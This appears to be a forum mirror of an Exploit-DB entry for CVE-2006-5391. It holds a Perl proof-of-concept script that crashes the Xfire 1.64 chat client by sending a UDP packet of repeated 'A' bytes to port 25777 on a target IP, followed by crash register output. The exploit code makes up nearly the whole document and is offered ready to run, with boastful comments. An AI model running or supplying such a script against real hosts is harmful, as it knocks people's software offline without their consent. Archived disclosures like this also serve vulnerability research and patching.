- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2571
- Проверка EDB
-
- Пройдено
- Автор
- N00B
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2006-5391
- Дата публикации
- 2006-10-16
Код:
#!/usr/bin/perl
#Moderator of http://igniteds.net
##############################################################################
#X fire version:new Release 1.64 <12th, 2006>
##############################################################################
#Vendors web site http://www.xfire.com/
#remote exploit coded by: n00b..
#Credit's to n00b for finding this bug..
#Xfire client has a dos exploit closing the client upon
#success full exploitation xfire will fail..Ive provided the following
#Proof of concept for the exploit..This exploit happens when a malicious
#packet is sent to the client on port udp port 25777 this will throw an exception
#causing xfire to terminate.Tested on win xp service pack 1 + 2.
#this is an example of the error on success full exploitation on the client side.
#################################################################################
#
# Error microsoft visual c++ runtime library
#
# program: c:\program files\xfire\xfire.exe
#
# r6025
# - pure virtual function call.
#################################################################################
#Debugging info available at crash time.
#
# eax=77c280e4 ebx=00000000 ecx=77c112b0 edx=77c61a70 esi=7c90e88e edi=000000ff
# eip=7c90eb94 esp=0012f5dc ebp=0012f6d8 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
# ntdll!KiFastSystemCallRet:
# 7c90eb94 c3 ret
#################################################################################
#the following is the proof of concept available..
print " 0day Xfire remote dos exploit coded by n00b Release 1.64 <12th, 2006> \n";
use IO::Socket;
$ip = $ARGV[0];
$payload = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
if(!$ip)
{
die "remember the ip\n";
}
$port = '25777';
$protocol = 'udp';
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Make sure service is running on the port\n";
print $socket $payload;
close($socket);
print "client has died h00ha \n";
# milw0rm.com [2006-10-16]- Источник
- www.exploit-db.com
